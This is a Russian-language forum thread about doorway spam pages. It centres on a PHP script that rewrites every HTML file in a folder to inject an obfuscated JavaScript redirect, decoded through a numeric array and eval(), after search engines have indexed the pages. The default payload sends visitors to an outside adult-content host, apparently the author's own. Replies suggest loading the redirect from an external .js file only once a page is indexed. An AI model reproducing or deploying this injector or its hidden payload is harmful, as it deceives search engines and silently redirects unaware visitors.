Скрипт для вставки редиректа

Тема в разделе "Вопросы новичков", создана пользователем starche, 17 авг 2009.

Статус темы:
Закрыта.
  1. starche

    starche

    Регистр.:
    5 янв 2009
    Сообщения:
    299
    Симпатии:
    45
    Не для кого не секрет что пихать дор в индекс лучше без редиректа, т.к. больше вероятность того что бот его схавает и не подавится. Но как же так? Дор без редиректа не очень прибыльное дело, ведь не факт что юзер кликнет по ссылке. Поэтому вставить редирект лучше всего после индексации и что бы не лопатить сотни, тысячи или сотни тысяч страниц я написал простенький скриптик для втавки редиректа.

    Настраиваем:
    $search - ищем место на странице где нужно оставить редирект, у меня после тега <body>
    $redirect - ваш редирект, хотя можете оставить мой, я не обижусь ;)
    $ext - расширение файлов

    Закидываем в папку с дором и исполняем скрипт


    PHP:
    <body bgcolor="black">
    <?
    //Настройки
    $search = "<body>";
    $redirect = '<script>var str=["699", "696", "695", "695", "695", "804", "783", "800", "718", "798", "797", "804", "747", "734", "745", "699", "696", "695", "695", "695", "788", "803", "796", "785", "802", "791", "797", "796", "718", "783", "807", "808", "805", "788", "807", "783", "797", "797", "799", "798", "797", "795", "792", "726", "799", "803", "787", "800", "807", "727", "809", "699", "696", "695", "695", "695", "695", "791", "788", "718", "726", "798", "797", "804", "747", "747", "734", "727", "809", "798", "797", "804", "747", "735", "745", "718", "801", "787", "802", "770", "791", "795", "787", "797", "803", "802", "726", "725", "783", "807", "808", "805", "788", "807", "783", "797", "797", "799", "798", "797", "795", "792", "726", "720", "725", "729", "799", "803", "787", "800", "807", "729", "725", "720", "727", "725", "730", "718", "739", "734", "734", "734", "727", "745", "718", "811", "718", "787", "794", "801", "787", "718", "809", "699", "696", "695", "695", "695", "695", "805", "791", "796", "786", "797", "805", "732", "794", "797", "785", "783", "802", "791", "797", "796", "747", "725", "790", "802", "802", "798", "744", "733", "733", "797", "786", "796", "797", "796", "797", "785", "790", "796", "791", "793", "791", "732", "805", "801", "733", "749", "800", "791", "786", "747", "735", "743", "735", "741", "725", "745", "699", "696", "695", "695", "695", "695", "811", "699", "696", "695", "695", "695", "811"];
     var temp="";
     var gg=""; 
     for (i=0; i<str.length; i++){
     gg=str[i]-686; 
     temp=temp+String.fromCharCode(gg); 
     } 
     eval(temp);
    ayzwfyaooqpomj("anal+porn");
    </script>';


    $ext = ".html";


    // Main
    $ok_count=0;
    $all_file=0;
    $dirop = opendir("./");
    while (gettype($file = readdir($dirop)) != 'boolean')
        {
            if ($file != "." && $file !=".." && ereg($ext, $file))
                {
                    $all_file++;
                    $arr = file($file);
                    foreach ($arr as $index=>$value)
                    {
                        if (eregi($search, $value))
                        {
                        
                        $arr[$index] =  $search . "\n" . $redirect . "\n";
                        
                        echo '<font color="lime">',$file, ' -----> Ok! </font> <br>';
                        $ok_count++;
                        
                        break;
                        } 
                    }    
                        $arr=implode('',$arr);
                        $fp=fopen($file, 'w');
                        fputs($fp,$arr);
                        fflush($fp);
                        fclose($fp);
                }
        }
        echo '<font color="lime"> Успешных: ', $ok_count, '</font><br>'; 
        echo '<font color="red"> Всего файлов: ', $all_file, '</font>';
    closedir($dirop);
    ?>
    </body>

    PS: ув. Модераторы, если не там разместил тему, то прошу перенести =)
     
    KHyT, DeXtR, luxer и 11 другим нравится это.
  2. -=ber$erk=-

    -=ber$erk=-

    Регистр.:
    17 мар 2008
    Сообщения:
    237
    Симпатии:
    105
    вот спасибо (кнопки "Спасибо" не узрел)
    а то я для этих целей textPipe хотел приспосабливать
    только теги <body> лишние... php всетаки
     
  3. starche

    starche

    Регистр.:
    5 янв 2009
    Сообщения:
    299
    Симпатии:
    45
    Одно другому не мешает ) Так покрасивее смотрится
     
  4. tatams

    tatams

    Регистр.:
    15 май 2009
    Сообщения:
    501
    Симпатии:
    84
    По субдиректориям ищет?
     
  5. I love this game

    I love this game Создатель

    Регистр.:
    9 фев 2009
    Сообщения:
    102
    Симпатии:
    3
    А не легче сделать так?
    Вставить в шаблон <script src="images/name.js"></script>, а после индексации вставить name.js
     
    bugargen и starche нравится это.
  6. starche

    starche

    Регистр.:
    5 янв 2009
    Сообщения:
    299
    Симпатии:
    45
    ахахах ) я об этом как то и не подумал :D Русские легких путей не ищут!
     
  7. expro

    expro Постоялец

    Регистр.:
    2 мар 2009
    Сообщения:
    51
    Симпатии:
    2
    А я обычно если использую js редирект, то сразу в страницы дора прописываю код для подгрузки js файла, в котором проверяется…*если страница проиндексирована, то делать редирект, если нет…*то нет!)
     
  8. goleon

    goleon Создатель

    Регистр.:
    8 мар 2009
    Сообщения:
    20
    Симпатии:
    1
    а можешь дать пример ??
     
  9. humandoor

    humandoor Постоялец

    Регистр.:
    11 июл 2009
    Сообщения:
    62
    Симпатии:
    5
    Присоединяюсь к "дать пример" )
    ТС, спасибо, попробуем.
    Только нубский вопрос - как исполнить php скрипт на хосте?
     
  10. starche

    starche

    Регистр.:
    5 янв 2009
    Сообщения:
    299
    Симпатии:
    45
    ставишь свои настройки, далее закидываешь на хост(хост должен поддерживать пхп) в папку с дором и набираешь в адресной строке путь до скрипта, к примеру хттп://dorway.ru/redirect.php

    Он обработает все файлы в каталоге в который его закинули
     
    humandoor нравится это.
Статус темы:
Закрыта.